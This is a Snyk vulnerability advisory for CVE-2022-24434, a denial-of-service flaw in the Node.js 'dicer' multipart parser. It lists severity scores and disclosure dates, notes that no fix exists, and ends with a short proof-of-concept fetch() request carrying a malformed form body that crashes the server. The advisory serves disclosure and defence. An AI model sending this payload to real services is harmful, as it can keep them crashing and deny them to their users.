Denial of Service (DoS) Affecting dicer package, versions *
Snyk CVSS
Attack Complexity
Low
Availability
High
Threat Intelligence
Exploit Maturity
Mature
EPSS
0.11% (44th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-DICER-2311764
- published 19 May 2022
- disclosed 7 Dec 2021
- credit Aras Abbasi
Introduced: 7 Dec 2021
CVE-2022-24434 Open this link in a new tabHow to fix?
There is no fixed version for dicer
.
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.
PoC:
fetch('form-image', {
method: 'POST',
headers: {
['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
['content-length']: '145',
host: '127.0.0.1:8000',
connection: 'keep-alive',
},
body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
});